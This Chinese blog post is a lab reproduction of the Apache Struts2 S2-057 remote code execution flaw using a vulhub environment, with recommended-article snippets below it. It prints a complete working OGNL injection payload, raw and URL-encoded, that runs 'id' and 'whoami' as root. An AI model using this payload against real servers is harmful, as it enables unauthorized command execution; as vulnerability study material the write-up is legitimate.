[漏洞复现]Struts2-057远程命令执行

最新推荐文章于 2022-11-01 10:38:08 发布
最新推荐文章于 2022-11-01 10:38:08 发布
阅读量577 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: struts2 rce apache st2-057 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/117163282
版权
本文详细介绍了Struts2的S2-057远程代码执行漏洞,涉及受影响的版本、漏洞成因、环境搭建、漏洞验证以及POC演示。通过访问特定URL,可以触发OGNL注入,执行系统命令,如`id`和`whoami`,显示出严重的安全风险。修复此漏洞的关键在于正确配置Struts2的action元素和namespace值。
摘要由CSDN通过智能技术生成

Struts2-057远程代码执行漏洞复现

影响版本:

<= Struts 2.3.34

Struts 2.5.16

简述:

定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行。

url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行。

a1waysSelectFul1Namespace为true—action元素没有设置namespace属性,或者使用了通配符

命名空间将由用户从uri传递,并解析为OGNL表达式,最终导致远程代码执行漏洞。

漏洞场景:

在Struts2配置文件中,对未正确配置的action元素提供如下三类返回元素:

a. Redirect Action

b. Action Chaining

c. Postback Result

以上提及的三种都属于Struts2的跳转方式

环境:

vulhub-master/struts2/s2-057

启动之后访问:

http://ip:8080/showcase

可以看到struts的测试页面:

image-20210522150725767

检验:${(111+111)}/actionChain1.action

访问:

http://192.168.17.134:8080/showcase/${(111+111)}/actionChain1.action后:

url变为:

http://192.168.17.134:8080/showcase/222/register2.action

111+111=222,说明产生了OGNL注入。

POC:执行id命令:

${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request[‘struts.valueStack’].context).(#cr=#ct[‘com.opensymphony.xwork2.ActionContext.container’]).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec(‘id’)).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

将POC进行url编码后拼接:

http://192.168.17.134:8080/showcase/%24%7B%0A(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B’struts.valueStack’%5D.context).(%23cr%3D%23ct%5B’com.opensymphony.xwork2.ActionContext.container’%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec(‘id’)).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action

访问之后url中返回命令id执行之后的结果。

http://192.168.17.134:8080/showcase/uid=0(root)%20gid=0(root)%20groups=0(root)%20/register2.action

image-20210522154740682

whoami命令:

http://192.168.17.134:8080/showcase/%24%7B%0A(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B’struts.valueStack’%5D.context).(%23cr%3D%23ct%5B’com.opensymphony.xwork2.ActionContext.container’%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec(‘whoami’)).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action

返回:

http://192.168.17.134:8080/showcase/root%20/register2.action

wwxxee
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057(CVE-2018-11776)
qq_51577576的博客
12-10 579
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057(CVE-2018-11776) 漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。
Struts2-057远程代码执行漏洞(s2-057)复现
m0_48520508的博客
12-10 902
0x00简介 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 0x01漏洞概述 漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并
struts2-057漏洞复现
小小猪的博客
10-29 222
struts2-057漏洞复现 环境复现: 直接开始,这里要膜拜一下大佬链接 首先本地使用docker部署vulhub,详细的可以参考https://www.douban.com/note/664677507/,或者百度一下,度娘上面说的还是蛮详细的。 大概来写下步骤 首先安装git yum install git-core 安装完成之后运行一下git clone试试,如果出现选项就说明安装成功了 安装docker sudo yum -y install docker-ce 尝试..
Struts2-057远程代码执行漏洞(s2-057/CVE-2018-11776)复现
bamanju0574的博客
08-21 876
参考了大佬的链接:https://github.com/jas502n/St2-057 00x01前言 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts 2。 Struts2是一个基于MVC设计模式的Web应用框架...
struts2-057扫描工具
08-27
然而,Struts2在历史上曾出现过多个安全漏洞,其中之一就是著名的“Struts2-057漏洞。这个漏洞属于远程代码执行(Remote Code Execution, RCE)类型,允许攻击者通过精心构造的HTTP请求在服务器端执行任意代码,...
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
Struts2-057漏洞检测python脚本
11-04
总结起来,Struts2-057漏洞是一个严重的问题,可能使服务器面临远程代码执行的风险。通过使用Python脚本进行检测,我们可以识别出存在漏洞的系统并采取措施进行修复,以保障网络安全。在日常开发和维护过程中,了解...
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 中的对象数据。在 Struts2 中,标签库使用 OGNL 表达式来获取对象数据,例如 `...
Struts2远程命令执行漏洞解析
01-06
Struts2远程命令执行漏洞解析 漏洞解析 远程命令 Struts2
struts2-057-exp
08-28
struts2-057-exp **Struts2-057/CVE-2018-11776两个版本RCE漏洞分析(含EXP)
structs2最新远程执行漏洞S2-057、反序列化漏洞等修复方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修复方案
struts2漏洞_Struts2-057漏洞从搭建到复现
weixin_39942785的博客
12-10 618
Free雅轩 合天智汇 漏洞描述2018年8月23日,ApacheStrust2发布最新安全公告,ApacheStruts2 存在远程代码执行的高危漏洞,该漏洞由SemmleSecurity Researchteam的安全研究员汇报,漏洞编号为CVE-2018-11776(S2-057)。...
Struts2-057 远程代码执行漏洞
weixin_43058307的博客
07-26 283
Struts2-057 远程代码执行漏洞 漏洞原理 Struts2 处理request请求过程原理 来源i春秋。 触发漏洞的关键点就在于可以修改struts2的配置文件,使得namespace变得可控,进而形成OGNL注入,执行任意代码.
Struts2 S2-057远程代码执行漏洞
最新发布
weixin_46801402的博客
11-01 847
Struts2 S2-057远程代码执行漏洞
stackstorm 15.编写stackstorm的actionchain
qingyuanluofeng的专栏
02-25 339
1 actionchain基础 创建一个动作链 动作链被定义在包中,在 /opt/stackstorm/packs/&lt;pack&gt;/actions/ 目录下。 一个动作链需要两个文件: 一个YAML元数据文件,和用于简单动作相同的作用, 和一个ActionChain定义文件。元数据文件在 &lt;pack&gt;/actions 目录, 而ActionChain定义被放在 &lt;p...
框架/组件漏洞系列1:struts2漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-03 9489
前言: 本篇文章中复现漏洞不是特别全面,但是挑选了最近两年的漏洞进行复现,旨在对漏洞进行有用复现,毕竟一些老漏洞已经基本不存在了。 一、Struts简介 1、简介 基本介绍: Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://.
struts2 代码执行(CVE-2018-11776)漏洞复现 vulfocus夺旗
muhan的博客
04-15 4565
1、启动环境:直接vulfocus搜索cve编号启动,并访问环境ip地址 2、判断是否有漏洞: 使用特定payload拼接url,访问抓包 ip地址/struts2-showcase/$%7B233*233%7D/actionChain1.action 利用BurpSuite抓包并改包,Go得到下图所示结果,说明存在漏洞。可以看到,233X233的结果已经在Location头中返回 3、构造POC,替换掉请求内容 原始poc: ${(#dm=@ognl.OgnlContext@DEFAULT
墨者Apache Struts2远程代码执行漏洞(S2-032)复现题解
zr1213159840的博客
01-15 2696
通过以下链接,能查到s2-032的漏洞信息,我们按照这个指导进行。 https://github.com/vulhub/vulhub/blob/master/struts2/s2-032/README.zh-cn.md 首先对访问的页面进行抓包,然后填入以下poc index.action?method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@g
[漏洞复现]Struts2-016命令执行漏洞复现
wwxxee
05-20 3436
Struts2-016命令执行漏洞 Struts2有很多漏洞,但是很多老系统都漏补了这个洞,成功率较高。 影响版本: 2.0.0 - 2.3.15 简述 Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式,并将用户通过URL提交的内容拼接入Ognl表达式中,从而造成攻击者可以通过构造恶意URL来执行任意Java代码,进而可执行任意命令。redirect:和redirectAction:此两项前缀为Struts默认开启功能。 在s
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值